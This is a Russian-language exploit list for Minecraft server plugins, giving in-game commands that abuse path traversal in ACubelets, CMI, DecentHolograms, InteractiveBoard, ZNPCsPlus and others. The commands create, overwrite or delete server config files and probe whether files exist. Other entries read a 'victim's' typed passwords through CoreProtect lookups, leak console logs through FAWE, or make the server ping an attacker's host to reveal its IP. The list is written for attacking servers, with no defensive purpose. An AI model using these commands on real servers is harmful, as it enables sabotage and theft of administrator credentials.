
Сборник различных мелких плагинов с возможностью махинацией с файлами

-----------------------------------------------\
ACubelets 2.5.1 (Все версии)
Создание (не замена) YML файла с указанным именем в любой уже созданной директории
/cubelets type create ../config rick

rarityID уязвим к YAML инъекции (Нет практического применения)
/cubelets type list
*клик на любой кейс*
*кликаем на Rarity*
*создаем свою редкость, в имени YAML-инъекция*
-----------------------------------------------\
AjLeaderboards (Все версии)
Создание json файла с указанным именем
/ajl export ../../nazvanie

Проверка существования файла на дедике
/ajl import ../../server.properties
-----------------------------------------------\
CMI (Все версии) Засер .txt и .yml
1.aliaseditor (.yml)
/aliaseditor
(жмём на плюсик)
(жмем на Filename)
(вводим ../config)
вуаля

2.editctest (.txt)
/editctext
(жмем на плюсик)
(вводим ../textovik)
вуаля

3.kiteditor (.yml)
/kiteditor
(жмем на название набора)
(жмем на верстак Settings)
(жмем на книжечку DisplayName)
(вводим ../config)
вуаля
-----------------------------------------------\
CoreProtect (Все версии) Просмотр паролей
Пишем:
/coreprotect lookup u:ник a:command
Откуда можно подглянуть пароль, или админ-пароль жертвы
-----------------------------------------------\
DecentHolograms (Все версии) Ресет конфигов
плагин повторил историю с HolographicDisplays
это не совсем в тему но все же, мы можем засирать и сносить любые файлы с расширением .yml
1 способ (засер конфига)
/dh create 123
/dh clone 123 /../../../plugins/папка плагина/config
2 способ (удаление конфига)
делаем все тоже самое но в конце пишем
/dh remove /../../../plugins/папка/config
-----------------------------------------------\
FAWE (Все версии)
Форк никогда не вымирающего плагина на редактирование мира
Пишем:
/fawe debugpaste
После которой вылезет ссылка на сайт со списком плагинов,
последней записью логов, и конфигом плагина. Таким образом
можно смотреть содержимое консоли.

Способ 2 (Pinger)
Работает только на старой версии
Пишем:
//br image *айпи своего дедика с портом* 25
Если новая версия:
Напишет что разрешен только imgur (У нас ничего не получилось)
Если старая:
Наш дедик пинганет.
Чекаем его на содержимое
-----------------------------------------------\
Images (Все версии)
Способ 1 
Дамп айпи сервера
/image create https://nightsoftcorp.com/lovely.jar.png

Способ 2
Проверка существования файла на дедике
/image create ../Vault
(Если файл существует, плагин предложит поставить картину)
-----------------------------------------------\
InteractiveBoard (2.2.2)
Создание любого .yml файла на дедике
/ib create
*выделяем по стене площадь*
/ib create ../../LuckPerms/config
(После создания файла возможность взаимодействия с ним утрачивается)
-----------------------------------------------\
JukeBox (Все версии)
Плагин на музыку имеет функцию загрузки.
Подгрузить то что нам не получится из-за сложной валидации загружаемого файла
Узнаем айпи дедика
Использование:
/amusic download 0.0.0.0/lol.nbs rick
-----------------------------------------------\
ZNPCsPlus (все версии)
можно взаимодействовать с директориями, создавать папки (нельзя взаимодействовать с папками где есть большие буквы в названии, то есть не будет работать с плагинами)
/npc create /../../data/config
/npc storage save
-----------------------------------------------\
